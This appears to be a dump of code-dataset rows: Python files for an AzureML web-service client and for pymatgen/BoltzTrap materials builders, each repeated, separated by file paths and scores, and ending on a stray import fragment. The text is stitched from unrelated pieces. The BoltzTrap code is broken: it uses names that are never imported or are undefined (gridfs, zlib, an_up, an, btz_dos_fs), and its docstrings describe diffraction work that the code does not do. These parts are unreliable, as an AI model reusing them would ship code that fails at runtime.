"""
return self.service_methods.keys()
# --------- local implementor
def __init_local_impl__(self):
"""
Implementors should create a local implementation and return it
:return:
"""
raise NotImplementedError("Local execution is not available for this client. Please override "
"`__init_local_impl__` or set a non-none `self._local_impl` if you wish local calls "
"to be made available")
@property
def local_impl(self):
if self._local_impl is None:
self._local_impl = self.__init_local_impl__()
return self._local_impl
def call_local_service(self,
function_name, # type: str
*args, **kwargs):
"""
This method is called automatically when a service method (i.e. decorated with `@azureml_service`)
is called and this instance is in "local" mode. It delegates to local.
:param function_name:
:param args:
:param kwargs:
:return:
"""
local_provider = self.local_impl
local_method = getattr(local_provider, function_name)
return local_method(*args, **kwargs)
# --------- configuration
@property
def client_config(self):
return self._client_config
@client_config.setter
def client_config(self,
client_config # type: ClientConfig
):
# validate configuration before accepting it
client_config.assert_valid_for_services(self.service_names)
self._client_config = client_config
# ------ convenience methods
@property
def global_cfg(self):
return self.client_config.global_config
@property
def services_cfg_dct(self):
return self.client_config.services_configs
# ------ call modes
@property
def current_call_mode(self):
if self._current_call_mode is None:
raise ValueError("Current call mode is None. Please set a call mode (local, rr, batch...) by using the "
"appropriate context manager")
return self._current_call_mode
@current_call_mode.setter
def current_call_mode(self, current_call_mode):
self._current_call_mode = current_call_mode
def is_local_mode(self):
"""
:return:
"""
return isinstance(self.current_call_mode, LocalCallMode)
# --- context managers to switch call mode
def local_calls(self):
"""
Alias for the `call_mode` context manager to temporarily switch this client to 'local' mode
>>> with client.local_calls():
>>> client.my_service(foo)
"""
return self.call_mode(LocalCallMode())
def rr_calls(self,
use_swagger_format=False # type: bool
):
"""
Alias for the `call_mode` context manager to temporarily switch this client to 'request response' mode
>>> with client.rr_calls():
>>> client.my_service(foo)
"""
return self.call_mode(RequestResponse(use_swagger_format=use_swagger_format))
def batch_calls(self,
polling_period_seconds=5, # type: int
):
"""
Alias for the `call_mode` context manager to temporarily switch this client to 'batch' mode
>>> with client.batch_calls(polling_period_seconds=5):
>>> client.my_service(foo)
"""
return self.call_mode(Batch(polling_period_seconds=polling_period_seconds))
@contextmanager
def call_mode(self,
mode # type: CallMode
):
"""
Context manager to temporarily switch this client to `mode` CallMode
>>> with client.call_mode(Batch(polling_period_seconds=20)):
>>> client.my_service(foo)
:param mode: the `CallMode` to switch to
:return:
"""
previous_mode = self.current_call_mode
self.current_call_mode = mode
yield
self.current_call_mode = previous_mode
def debug_requests(self):
"""
Context manager to temporarily enable debug mode on requests.
:return:
"""
return debug_requests()
# ------
def call_azureml(self,
service_id, # type: Union[str, Callable]
ws_inputs, # type: Dict[str, pd.DataFrame]
ws_output_names, # type: Optional[List[str]]
ws_params=None, # type: Dict[str, str]
):
"""
Calls the service identified with id service_id in the services configuration.
Inputs
:param service_id: a string identifier or a method representing the service
:param ws_inputs: a (name, DataFrame) dictionary of web service inputs
:param ws_output_names: a list of web service outputs, or `None` to allow all outputs to be received
:param ws_params: a (param_name, value) dictionary of web service parameters
:return:
"""
# -- one can provide a method as the service id
if callable(service_id):
service_id = get_azureml_service_name(service_id)
# -- Retrieve service configuration
if service_id not in self.client_config.services_configs.keys():
raise ValueError('Unknown service_id: \'' + service_id + '\'')
else:
service_config = self.client_config.services_configs[service_id]
# -- Perform call according to options
return self.current_call_mode.call_azureml(service_id,
service_config=service_config, ws_inputs=ws_inputs,
ws_output_names=ws_output_names, ws_params=ws_params,
session=self.session)
def unpack_single_value_from_df(name, # type: str
df, # type: pd.DataFrame
allow_empty=True # type: bool
):
"""
Utility method to unpack a single value from a DataFrame.
If allow_empty is True (default), an empty DataFrame will be accepted and None will be returned.
:param name: the name of the DataFrame, for validation purposes
:param df:
:param allow_empty:
:return:
"""
values = df.values.ravel()
if len(values) == 1:
return values[0]
elif len(values) == 0 and allow_empty:
return None
else:
raise ValueError("DataFrame '%s' is supposed to contain a single value but does not: \n%s" % (name, df)) | azmlclient/clients.py | import sys
from contextlib import contextmanager
from inspect import getmembers, isroutine
from logging import getLogger, StreamHandler, INFO
from warnings import warn
try: # python 3+
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
try: # python 3.5+
from typing import Dict, List, Callable, Union, Optional
from logging import Logger
except ImportError:
pass
from decopatch import function_decorator, DECORATED
from makefun import wraps
from requests import Session
import pandas as pd
from azmlclient.clients_callmodes import CallMode, Batch, RequestResponse, LocalCallMode
from azmlclient.clients_config import ClientConfig
from azmlclient.utils_requests import debug_requests
# default logger that may be used by clients
default_logger = getLogger('azmlclient')
ch = StreamHandler(sys.stdout)
default_logger.addHandler(ch)
default_logger.setLevel(INFO)
AZML_SERVICE_ID = '__azml_service__'
class LocalCallModeNotAllowed(Exception):
"""
Exception raised when users call a method corresponding to a
"""
__slots__ = 'f',
def __init__(self, f):
self.f = f
super(LocalCallModeNotAllowed, self).__init__()
def __str__(self):
return repr(self)
def __repr__(self):
azml_service_name = get_azureml_service_name(self.f)
return "function '%s' (service '%s') is remote-only and can not be executed in local mode " \
"(`allow_local=False`). Please change call mode to request-response or batch before using it." \
% (self.f.__name__, azml_service_name)
@function_decorator
def azureml_service(service_name=None, # type: str
remote_only=False, # type: bool
f=DECORATED,
):
"""
A decorator for methods in your `AzureMLClient` subclasses, that you should use to indicate that a given method
corresponds to an AzureML service. That way, the `AzureMLClient` base class will be able to link this method
with local implementation and with the service configuration (url, api key).
This decorator performs two things:
- It wraps the decorated method into a method able to route "local"-mode calls to `self.call_local_service`
- It adds the `AZML_SERVICE_ID` attribute with the `service_name` so that the method is known as being
AzureML-related, and therefore the appropriate service configuration can be looked up.
:param service_name: the optional service name appearing in the `AzureMLClient` configuration (`ClientConfig`). By
default this is `None` and means that the method name should be used as the service name.
:param remote_only: a boolean (default False) indicating if a service should be considered remote-only. If True, an
appropriate exception will be raised if the service is used in local mode.
"""
@wraps(f)
def f_wrapper(self, # type: AzureMLClient
*args,
**kwargs):
"""
:param self:
:param args:
:param kwargs:
:return:
"""
if self.is_local_mode():
if not remote_only:
# execute the same method on local implementor rather than client.
return self.call_local_service(f.__name__, *args, **kwargs)
else:
raise LocalCallModeNotAllowed(f_wrapper)
else:
# execute as usual
return f(self, *args, **kwargs)
# tag the method as being related to an AzureML service with given id
setattr(f_wrapper, AZML_SERVICE_ID, service_name)
return f_wrapper
def get_azureml_service_name(f):
"""
Returns the AzureML service name associated with method `f`.
:param f:
:return:
"""
try:
# If this is the bound (=instance) method, get the unbound (=class) one
if hasattr(f, '__func__'):
f = f.__func__
azml_name = getattr(f, AZML_SERVICE_ID)
except AttributeError:
raise ValueError("Method '%s' can not be bound to an AzureML service, please decorate it with "
"@azureml_service." % f.__name__)
else:
return azml_name if azml_name is not None else f.__name__
class AzureMLClient:
"""
Base class for AzureML clients.
A client is configured with a mandatory `ClientConfig` object describing global and per-service options (endpoint
urls, api keys).
It provides a way to create them from a configuration containing endpoint definitions,
and to declare a local implementation
"""
def __init__(self,
client_config, # type: ClientConfig
logger=default_logger, # type: Logger
default_call_mode=None, # type: CallMode
requests_session=None, # type: Session
auto_close_session=None # type: bool
):
"""
Creates an `AzureMLClient` with an initial `ClientConfig` containing the global and per-service configurations.
Constructor with a global configuration and service endpoint configurations. The service endpoint
configurations should be provided in a dictionary with keys being the service names. Only names declared in the
'services' meta attribute of the class will be accepted, otherwise and error will be raised. Note that you may
provide configurations for some services only.
A `requests.Session` object is automatically created when the client is created, and possibly configured with
the proxy information obtained from the `ClientConfig`. The `Session` is automatically closed when the client
instance is garbaged out. A custom `Session` can be passed to the constructor instead. It won't be closed nor
configured by default, the user should do it (using `session.close()` and `<config>.configure_session(session)`
respectively).
:param client_config: a configuration for this component client. It should be valid = contain sections for
each service in this client. The configuration can contain proxy information, in which case it will
be used to configure the underlying requests Session that is created.
:param logger:
:param default_call_mode: (advanced) if a non-None `CallMode` instance is provided, it will be used as the
default call mode for this client. Otherwise by default a request-response call mode will be set as the
default call mode (`RequestResponse()`)
:param requests_session: (advanced) an optional `Session` object to use (from `requests` lib). If `None` is
provided, a new `Session` will be used, possibly configured with the proxy information in the `ClientConfig`
and deleted when this object is garbaged out. If a custom object is provided, you should close it yourself
or switch `auto_close_session` to `True` explicitly. You should also configure it yourself, for example
with `<config>.configure_session(session)`.
:param auto_close_session: an optional boolean indicating if `self.session` should be closed when this object
is garbaged out. By default this is `None` and means "`True` if no custom `requests_session` is passed, else
`False`"). Turning this to `False` can leave hanging Sockets unclosed.
"""
# save the attributes
self.client_config = client_config
self.logger = logger
if default_call_mode is None:
# by default make this a request response
default_call_mode = RequestResponse()
self._current_call_mode = default_call_mode
# init the local impl property
self._local_impl = None
if requests_session is None:
# create and configure a session
self.session = Session()
self.global_cfg.configure_session(self.session)
else:
# custom provided : do not configure it
self.session = requests_session
# auto-close behaviour
if auto_close_session is None:
# default: only auto-close if this session was created by us.
auto_close_session = requests_session is None
self.auto_close_session = auto_close_session
def __del__(self):
"""
This is called when the garbage collector deletes this object.
Let's use this opportunity to close the requests Session to avoid
leaving hanging Sockets, see https://github.com/smarie/python-odsclient/issues/27
"""
if self.auto_close_session and self.session is not None:
try:
# close the underlying `requests.Session`
self.session.close()
except Exception as e:
warn("Error while closing session: %r" % e)
# --------- remote service calls implementation
@property
def service_methods(self):
"""
returns a dictionary of all service methods referenced by AzureML service name.
These are all methods in the class that have been decorated with `@azureml_service`
:return:
"""
return {get_azureml_service_name(v[1]): v[1]
for v in getmembers(self.__class__, predicate=lambda x: isroutine(x) and hasattr(x, AZML_SERVICE_ID))}
@property
def service_names(self):
"""
Returns the list of all service names - basically the names of the `service_methods`
:return:
"""
return self.service_methods.keys()
# --------- local implementor
def __init_local_impl__(self):
"""
Implementors should create a local implementation and return it
:return:
"""
raise NotImplementedError("Local execution is not available for this client. Please override "
"`__init_local_impl__` or set a non-none `self._local_impl` if you wish local calls "
"to be made available")
@property
def local_impl(self):
if self._local_impl is None:
self._local_impl = self.__init_local_impl__()
return self._local_impl
def call_local_service(self,
function_name, # type: str
*args, **kwargs):
"""
This method is called automatically when a service method (i.e. decorated with `@azureml_service`)
is called and this instance is in "local" mode. It delegates to local.
:param function_name:
:param args:
:param kwargs:
:return:
"""
local_provider = self.local_impl
local_method = getattr(local_provider, function_name)
return local_method(*args, **kwargs)
# --------- configuration
@property
def client_config(self):
return self._client_config
@client_config.setter
def client_config(self,
client_config # type: ClientConfig
):
# validate configuration before accepting it
client_config.assert_valid_for_services(self.service_names)
self._client_config = client_config
# ------ convenience methods
@property
def global_cfg(self):
return self.client_config.global_config
@property
def services_cfg_dct(self):
return self.client_config.services_configs
# ------ call modes
@property
def current_call_mode(self):
if self._current_call_mode is None:
raise ValueError("Current call mode is None. Please set a call mode (local, rr, batch...) by using the "
"appropriate context manager")
return self._current_call_mode
@current_call_mode.setter
def current_call_mode(self, current_call_mode):
self._current_call_mode = current_call_mode
def is_local_mode(self):
"""
:return:
"""
return isinstance(self.current_call_mode, LocalCallMode)
# --- context managers to switch call mode
def local_calls(self):
"""
Alias for the `call_mode` context manager to temporarily switch this client to 'local' mode
>>> with client.local_calls():
>>> client.my_service(foo)
"""
return self.call_mode(LocalCallMode())
def rr_calls(self,
use_swagger_format=False # type: bool
):
"""
Alias for the `call_mode` context manager to temporarily switch this client to 'request response' mode
>>> with client.rr_calls():
>>> client.my_service(foo)
"""
return self.call_mode(RequestResponse(use_swagger_format=use_swagger_format))
def batch_calls(self,
polling_period_seconds=5, # type: int
):
"""
Alias for the `call_mode` context manager to temporarily switch this client to 'batch' mode
>>> with client.batch_calls(polling_period_seconds=5):
>>> client.my_service(foo)
"""
return self.call_mode(Batch(polling_period_seconds=polling_period_seconds))
@contextmanager
def call_mode(self,
mode # type: CallMode
):
"""
Context manager to temporarily switch this client to `mode` CallMode
>>> with client.call_mode(Batch(polling_period_seconds=20)):
>>> client.my_service(foo)
:param mode: the `CallMode` to switch to
:return:
"""
previous_mode = self.current_call_mode
self.current_call_mode = mode
yield
self.current_call_mode = previous_mode
def debug_requests(self):
"""
Context manager to temporarily enable debug mode on requests.
:return:
"""
return debug_requests()
# ------
def call_azureml(self,
service_id, # type: Union[str, Callable]
ws_inputs, # type: Dict[str, pd.DataFrame]
ws_output_names, # type: Optional[List[str]]
ws_params=None, # type: Dict[str, str]
):
"""
Calls the service identified with id service_id in the services configuration.
Inputs
:param service_id: a string identifier or a method representing the service
:param ws_inputs: a (name, DataFrame) dictionary of web service inputs
:param ws_output_names: a list of web service outputs, or `None` to allow all outputs to be received
:param ws_params: a (param_name, value) dictionary of web service parameters
:return:
"""
# -- one can provide a method as the service id
if callable(service_id):
service_id = get_azureml_service_name(service_id)
# -- Retrieve service configuration
if service_id not in self.client_config.services_configs.keys():
raise ValueError('Unknown service_id: \'' + service_id + '\'')
else:
service_config = self.client_config.services_configs[service_id]
# -- Perform call according to options
return self.current_call_mode.call_azureml(service_id,
service_config=service_config, ws_inputs=ws_inputs,
ws_output_names=ws_output_names, ws_params=ws_params,
session=self.session)
def unpack_single_value_from_df(name, # type: str
df, # type: pd.DataFrame
allow_empty=True # type: bool
):
"""
Utility method to unpack a single value from a DataFrame.
If allow_empty is True (default), an empty DataFrame will be accepted and None will be returned.
:param name: the name of the DataFrame, for validation purposes
:param df:
:param allow_empty:
:return:
"""
values = df.values.ravel()
if len(values) == 1:
return values[0]
elif len(values) == 0 and allow_empty:
return None
else:
raise ValueError("DataFrame '%s' is supposed to contain a single value but does not: \n%s" % (name, df)) | 0.730866 | 0.132543 |
import logging
from datetime import datetime
from monty.json import jsanitize
from monty.tempfile import ScratchDir
from pymatgen.core.structure import Structure
from pymatgen.electronic_structure.boltztrap import BoltztrapRunner
from maggma.builders import Builder
__author__ = "<NAME> <<EMAIL>>"
class BoltztrapDosBuilder(Builder):
def __init__(self,
materials,
boltztrap,
bandstructure_fs="bandstructure_fs",
btz_cdos_fs=None,
query=None,
**kwargs):
"""
Calculates Density of States (DOS) using BoltzTrap
Saves the dos object
Args:
materials (Store): Store of materials documents
boltztrap (Store): Store of boltztrap
bandstructure_fs (str): Name of the GridFS where bandstructures are stored
query (dict): dictionary to limit materials to be analyzed
"""
self.materials = materials
self.boltztrap = boltztrap
self.bandstructure_fs = bandstructure_fs
self.btz_cdos_fs = btz_cdos_fs
self.query = query if query else {}
super().__init__(sources=[materials], targets=[boltztrap], **kwargs)
def get_items(self):
"""
Gets all materials that need a new DOS
Returns:
generator of materials to calculate DOS
"""
self.logger.info("BoltzTrap Dos Builder Started")
# All relevant materials that have been updated since boltztrap was last run
# and a uniform bandstructure exists
q = dict(self.query)
q.update(self.materials.lu_filter(self.boltztrap))
q["bandstructure.uniform_oid"] = {"$exists": 1}
#q["output.bandgap"] = {"$gt": 0.0}
mats = set(self.materials.distinct(self.materials.key, criteria=q))
# initialize the gridfs
bfs = gridfs.GridFS(self.materials.database, self.bandstructure_fs)
self.logger.info("Found {} new materials for calculating boltztrap dos".format(len(mats)))
for m in mats:
mat = self.materials.query([self.materials.key, "structure", "input.parameters.NELECT", "bandstructure"],
criteria={self.materials.key: m})
# If a bandstructure oid exists
if "uniform_bs_oid" in mat.get("bandstructure", {}):
bs_json = bfs.get(mat["bandstructure"]["uniform_bs_oid"]).read()
if "zlib" in mat["bandstructure"].get("uniform_bs_compression", ""):
bs_json = zlib.decompress(bs_json)
bs_dict = json.loads(bs_json.decode())
mat["bandstructure"]["uniform_bs"] = bs_dict
yield mat
def process_item(self, item):
"""
Calculates dos running Boltztrap in DOS run mode
Args:
item (dict): a dict with a material_id, bs and a structure
Returns:
cdos: a complete dos object
"""
self.logger.debug("Calculating Boltztrap for {}".format(item[self.materials.key]))
nelect = item["input"]["parameters"]["NELECT"]
bs_dict = item["uniform_bandstructure"]["bs"]
bs_dict['structure'] = item['structure']
bs = BandStructure.from_dict(bs_dict)
with ScratchDir("."):
if bs.is_spin_polarized:
run_path = os.path.join(os.getcwd(), "dos_up")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA", spin=1).run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta_up = BoltztrapAnalyzer.from_files(btrap_dir)
run_path = os.path.join(os.getcwd(), "dos_dw")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA", spin=-1).run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta_dw = BoltztrapAnalyzer.from_files(btrap_dir)
cdos = an_up.get_complete_dos(bs.structure, an_dw)
else:
run_path = os.path.join(os.getcwd(), "dos")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA").run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta = BoltztrapAnalyzer.from_files(btrap_dir)
cdos = an.get_complete_dos(bs.structure)
return {'cdos': cdos.as_dict()}
def update_targets(self, items):
"""
Inserts the new task_types into the task_types collection
Args:
items ([[dict]]): a list of list of thermo dictionaries to update
"""
items = list(filter(None, items))
btz_cdos_fs = gridfs.GridFS(self.materials.database, self.btz_cdos_fs) if self.btz_cdos_fs else None
if len(items) > 0:
self.logger.info("Updating {} boltztrap dos".format(len(items)))
for doc in items:
if self.bta_fs:
btz_dos_doc = dict(doc["cdos"])
btz_dos_json = json.dumps(jsanitize(btz_dos_doc))
btz_dos_gz = zlib.compress(btz_dos_json)
btz_dos_oid = btz_dos_fs.put(btz_dos_gz)
doc['btz_dos_oid'] = btz_dos_oid
doc['btz_dos_compression'] = "zlib"
del doc["cdos"]
self.boltztrap.update(items)
else:
self.logger.info("No items to update")
class BoltztrapBuilder(Builder):
def __init__(self, materials, boltztrap, bandstructure_fs="bandstructure_fs", bta_fs=None, query=None, **kwargs):
"""
Calculates conducitivty parameters using BoltzTrap
Saves the boltztrap analyzer in bta_fs if set otherwise doesn't store it
because it is too large usually to store in Mongo
Args:
materials (Store): Store of materials documents
boltztrap (Store): Store of boltztrap
bandstructure_fs (str): Name of the GridFS where bandstructures are stored
query (dict): dictionary to limit materials to be analyzed
"""
self.materials = materials
self.boltztrap = boltztrap
self.bandstructure_fs = bandstructure_fs
self.bta_fs = bta_fs
self.query = query if query else {}
super().__init__(sources=[materials], targets=[boltztrap], **kwargs)
def get_items(self):
"""
Gets all materials that need a new XRD
Returns:
generator of materials to calculate xrd
"""
self.logger.info("BoltzTrap Builder Started")
# All relevant materials that have been updated since boltztrap was last run
# and a uniform bandstructure exists
q = dict(self.query)
q.update(self.materials.lu_filter(self.boltztrap))
q["bandstructure.uniform_oid"] = {"$exists": 1}
q["output.bandgap"] = {"$gt": 0.0}
mats = set(self.materials.distinct(self.materials.key, criteria=q))
# initialize the gridfs
bfs = gridfs.GridFS(self.materials.database, self.bandstructure_fs)
self.logger.info("Found {} new materials for calculating boltztrap conductivity".format(len(mats)))
for m in mats:
mat = self.materials.query([self.materials.key, "structure", "input.parameters.NELECT", "bandstructure"],
criteria={self.materials.key: m})
# If a bandstructure oid exists
if "uniform_bs_oid" in mat.get("bandstructure", {}):
bs_json = bfs.get(mat["bandstructure"]["uniform_bs_oid"]).read()
if "zlib" in mat["bandstructure"].get("uniform_bs_compression", ""):
bs_json = zlib.decompress(bs_json)
bs_dict = json.loads(bs_json.decode())
mat["bandstructure"]["uniform_bs"] = bs_dict
yield mat
def process_item(self, item):
"""
Calculates diffraction patterns for the structures
Args:
item (dict): a dict with a material_id and a structure
Returns:
dict: a diffraction dict
"""
self.logger.debug("Calculating Boltztrap for {}".format(item[self.materials.key]))
nelect = item["input"]["parameters"]["NELECT"]
bs_dict = item["uniform_bandstructure"]["bs"]
bs_dict['structure'] = item['structure']
bs = BandStructure.from_dict(bs_dict)
with ScratchDir("."):
BoltztrapRunner(bs=bs, nelec=nelect).run(path_dir=os.getcwd())
btrap_dir = os.path.join(os.getcwd(), "boltztrap")
bta = BoltztrapAnalyzer.from_files(btrap_dir)
d = {
"bta": bta.as_dict(),
"boltztrap": {
"thermoelectric": bt_analysis_thermoelectric(bta),
"tcm": bt_analysis_tcm(bta)
}
}
return d
def update_targets(self, items):
"""
Inserts the new task_types into the task_types collection
Args:
items ([[dict]]): a list of list of thermo dictionaries to update
"""
items = list(filter(None, items))
bta_fs = gridfs.GridFS(self.materials.database, self.bta_fs) if self.bta_fs else None
if len(items) > 0:
self.logger.info("Updating {} boltztrap docs".format(len(items)))
for doc in items:
if self.bta_fs:
bta_doc = dict(doc["bta"])
bta_json = json.dumps(jsanitize(bta_doc))
bta_gz = zlib.compress(bta_json)
bta_oid = bta_fs.put(bta_gz)
doc['bta_oid'] = bta_oid
doc['bta_compression'] = "zlib"
del doc["bta"]
self.boltztrap.update(items)
else:
self.logger.info("No items to update")
def bt_analysis_thermoelectric(bta):
"""
Performs analysis for thermoelectrics search
:param bta: Boltztrap analyzer object
:return: dict of Zt,Power Factor, Seebeck, Conducitity and Kappa
"""
d = {}
d["zt"] = bta.get_extreme("zt")
d["pf"] = bta.get_extreme("power factor")
d["seebeck"] = bta.get_extreme("seebeck")
d["conductivity"] = bta.get_extreme("conductivity")
d["kappa_max"] = bta.get_extreme("kappa")
d["kappa_min"] = bta.get_extreme("kappa", maximize=False)
return d
def bt_analysis_tcm(bta, temp_min=300, temp_max=400, doping_min=1e19, doping_max=1e22):
"""
Performs analysis for transparent conductive materials
Focuses on T=300-400K and Doping=1E19-1E22
:param bta: Boltztrap analyzer object
:return: dict of conductivity and effective mass
"""
d = {}
d['avg_eff_mass'] = bta.get_average_eff_mass()
d['doping'] = bta.doping
return d | emmet/materials/boltztrap.py | import logging
from datetime import datetime
from monty.json import jsanitize
from monty.tempfile import ScratchDir
from pymatgen.core.structure import Structure
from pymatgen.electronic_structure.boltztrap import BoltztrapRunner
from maggma.builders import Builder
__author__ = "<NAME> <<EMAIL>>"
class BoltztrapDosBuilder(Builder):
def __init__(self,
materials,
boltztrap,
bandstructure_fs="bandstructure_fs",
btz_cdos_fs=None,
query=None,
**kwargs):
"""
Calculates Density of States (DOS) using BoltzTrap
Saves the dos object
Args:
materials (Store): Store of materials documents
boltztrap (Store): Store of boltztrap
bandstructure_fs (str): Name of the GridFS where bandstructures are stored
query (dict): dictionary to limit materials to be analyzed
"""
self.materials = materials
self.boltztrap = boltztrap
self.bandstructure_fs = bandstructure_fs
self.btz_cdos_fs = btz_cdos_fs
self.query = query if query else {}
super().__init__(sources=[materials], targets=[boltztrap], **kwargs)
def get_items(self):
"""
Gets all materials that need a new DOS
Returns:
generator of materials to calculate DOS
"""
self.logger.info("BoltzTrap Dos Builder Started")
# All relevant materials that have been updated since boltztrap was last run
# and a uniform bandstructure exists
q = dict(self.query)
q.update(self.materials.lu_filter(self.boltztrap))
q["bandstructure.uniform_oid"] = {"$exists": 1}
#q["output.bandgap"] = {"$gt": 0.0}
mats = set(self.materials.distinct(self.materials.key, criteria=q))
# initialize the gridfs
bfs = gridfs.GridFS(self.materials.database, self.bandstructure_fs)
self.logger.info("Found {} new materials for calculating boltztrap dos".format(len(mats)))
for m in mats:
mat = self.materials.query([self.materials.key, "structure", "input.parameters.NELECT", "bandstructure"],
criteria={self.materials.key: m})
# If a bandstructure oid exists
if "uniform_bs_oid" in mat.get("bandstructure", {}):
bs_json = bfs.get(mat["bandstructure"]["uniform_bs_oid"]).read()
if "zlib" in mat["bandstructure"].get("uniform_bs_compression", ""):
bs_json = zlib.decompress(bs_json)
bs_dict = json.loads(bs_json.decode())
mat["bandstructure"]["uniform_bs"] = bs_dict
yield mat
def process_item(self, item):
"""
Calculates dos running Boltztrap in DOS run mode
Args:
item (dict): a dict with a material_id, bs and a structure
Returns:
cdos: a complete dos object
"""
self.logger.debug("Calculating Boltztrap for {}".format(item[self.materials.key]))
nelect = item["input"]["parameters"]["NELECT"]
bs_dict = item["uniform_bandstructure"]["bs"]
bs_dict['structure'] = item['structure']
bs = BandStructure.from_dict(bs_dict)
with ScratchDir("."):
if bs.is_spin_polarized:
run_path = os.path.join(os.getcwd(), "dos_up")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA", spin=1).run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta_up = BoltztrapAnalyzer.from_files(btrap_dir)
run_path = os.path.join(os.getcwd(), "dos_dw")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA", spin=-1).run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta_dw = BoltztrapAnalyzer.from_files(btrap_dir)
cdos = an_up.get_complete_dos(bs.structure, an_dw)
else:
run_path = os.path.join(os.getcwd(), "dos")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA").run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta = BoltztrapAnalyzer.from_files(btrap_dir)
cdos = an.get_complete_dos(bs.structure)
return {'cdos': cdos.as_dict()}
def update_targets(self, items):
"""
Inserts the new task_types into the task_types collection
Args:
items ([[dict]]): a list of list of thermo dictionaries to update
"""
items = list(filter(None, items))
btz_cdos_fs = gridfs.GridFS(self.materials.database, self.btz_cdos_fs) if self.btz_cdos_fs else None
if len(items) > 0:
self.logger.info("Updating {} boltztrap dos".format(len(items)))
for doc in items:
if self.bta_fs:
btz_dos_doc = dict(doc["cdos"])
btz_dos_json = json.dumps(jsanitize(btz_dos_doc))
btz_dos_gz = zlib.compress(btz_dos_json)
btz_dos_oid = btz_dos_fs.put(btz_dos_gz)
doc['btz_dos_oid'] = btz_dos_oid
doc['btz_dos_compression'] = "zlib"
del doc["cdos"]
self.boltztrap.update(items)
else:
self.logger.info("No items to update")
class BoltztrapBuilder(Builder):
def __init__(self, materials, boltztrap, bandstructure_fs="bandstructure_fs", bta_fs=None, query=None, **kwargs):
"""
Calculates conducitivty parameters using BoltzTrap
Saves the boltztrap analyzer in bta_fs if set otherwise doesn't store it
because it is too large usually to store in Mongo
Args:
materials (Store): Store of materials documents
boltztrap (Store): Store of boltztrap
bandstructure_fs (str): Name of the GridFS where bandstructures are stored
query (dict): dictionary to limit materials to be analyzed
"""
self.materials = materials
self.boltztrap = boltztrap
self.bandstructure_fs = bandstructure_fs
self.bta_fs = bta_fs
self.query = query if query else {}
super().__init__(sources=[materials], targets=[boltztrap], **kwargs)
def get_items(self):
"""
Gets all materials that need a new XRD
Returns:
generator of materials to calculate xrd
"""
self.logger.info("BoltzTrap Builder Started")
# All relevant materials that have been updated since boltztrap was last run
# and a uniform bandstructure exists
q = dict(self.query)
q.update(self.materials.lu_filter(self.boltztrap))
q["bandstructure.uniform_oid"] = {"$exists": 1}
q["output.bandgap"] = {"$gt": 0.0}
mats = set(self.materials.distinct(self.materials.key, criteria=q))
# initialize the gridfs
bfs = gridfs.GridFS(self.materials.database, self.bandstructure_fs)
self.logger.info("Found {} new materials for calculating boltztrap conductivity".format(len(mats)))
for m in mats:
mat = self.materials.query([self.materials.key, "structure", "input.parameters.NELECT", "bandstructure"],
criteria={self.materials.key: m})
# If a bandstructure oid exists
if "uniform_bs_oid" in mat.get("bandstructure", {}):
bs_json = bfs.get(mat["bandstructure"]["uniform_bs_oid"]).read()
if "zlib" in mat["bandstructure"].get("uniform_bs_compression", ""):
bs_json = zlib.decompress(bs_json)
bs_dict = json.loads(bs_json.decode())
mat["bandstructure"]["uniform_bs"] = bs_dict
yield mat
def process_item(self, item):
"""
Calculates diffraction patterns for the structures
Args:
item (dict): a dict with a material_id and a structure
Returns:
dict: a diffraction dict
"""
self.logger.debug("Calculating Boltztrap for {}".format(item[self.materials.key]))
nelect = item["input"]["parameters"]["NELECT"]
bs_dict = item["uniform_bandstructure"]["bs"]
bs_dict['structure'] = item['structure']
bs = BandStructure.from_dict(bs_dict)
with ScratchDir("."):
BoltztrapRunner(bs=bs, nelec=nelect).run(path_dir=os.getcwd())
btrap_dir = os.path.join(os.getcwd(), "boltztrap")
bta = BoltztrapAnalyzer.from_files(btrap_dir)
d = {
"bta": bta.as_dict(),
"boltztrap": {
"thermoelectric": bt_analysis_thermoelectric(bta),
"tcm": bt_analysis_tcm(bta)
}
}
return d
def update_targets(self, items):
"""
Inserts the new task_types into the task_types collection
Args:
items ([[dict]]): a list of list of thermo dictionaries to update
"""
items = list(filter(None, items))
bta_fs = gridfs.GridFS(self.materials.database, self.bta_fs) if self.bta_fs else None
if len(items) > 0:
self.logger.info("Updating {} boltztrap docs".format(len(items)))
for doc in items:
if self.bta_fs:
bta_doc = dict(doc["bta"])
bta_json = json.dumps(jsanitize(bta_doc))
bta_gz = zlib.compress(bta_json)
bta_oid = bta_fs.put(bta_gz)
doc['bta_oid'] = bta_oid
doc['bta_compression'] = "zlib"
del doc["bta"]
self.boltztrap.update(items)
else:
self.logger.info("No items to update")
def bt_analysis_thermoelectric(bta):
"""
Performs analysis for thermoelectrics search
:param bta: Boltztrap analyzer object
:return: dict of Zt,Power Factor, Seebeck, Conducitity and Kappa
"""
d = {}
d["zt"] = bta.get_extreme("zt")
d["pf"] = bta.get_extreme("power factor")
d["seebeck"] = bta.get_extreme("seebeck")
d["conductivity"] = bta.get_extreme("conductivity")
d["kappa_max"] = bta.get_extreme("kappa")
d["kappa_min"] = bta.get_extreme("kappa", maximize=False)
return d
def bt_analysis_tcm(bta, temp_min=300, temp_max=400, doping_min=1e19, doping_max=1e22):
"""
Performs analysis for transparent conductive materials
Focuses on T=300-400K and Doping=1E19-1E22
:param bta: Boltztrap analyzer object
:return: dict of conductivity and effective mass
"""
d = {}
d['avg_eff_mass'] = bta.get_average_eff_mass()
d['doping'] = bta.doping
return d | 0.713931 | 0.273866 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import argparse
import os
from skimage.io import imsave
